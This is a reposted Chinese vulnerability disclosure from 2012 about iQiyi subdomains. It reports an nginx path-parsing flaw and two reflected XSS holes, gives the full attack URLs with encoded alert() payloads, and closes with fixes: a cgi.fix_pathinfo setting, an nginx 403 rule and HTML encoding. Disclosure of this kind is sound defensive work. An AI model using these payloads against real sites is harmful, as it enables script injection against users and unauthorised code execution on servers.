奇艺分站nginx解析及xss漏洞

2012-8-22 10:32:40 来源:网络转载 浏览:435
奇艺最新漏洞公布:奇艺分站nginx解析及xss漏洞。

简要描述:
奇艺分站nginx解析+xss

详细说明:h
ttp://vote.video.qiyi.com/survey/static/qiyi_logo.png/test.php nginx解析漏洞
http://list.iqiyi.com/?1%3C/title%3E1%22/%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E xss
http://top.iqiyi.com/index/top50.htm?cid=1&dim=%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22 xss

漏洞证明:

奇艺分站nginx解析及xss

【图一】

奇艺分站nginx解析及xss

【图二】

奇艺分站nginx解析及xss

【图三】

修复方案:
关闭cgi.fix_pathinfo为0
或者
if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}
html编码

(0)
(0)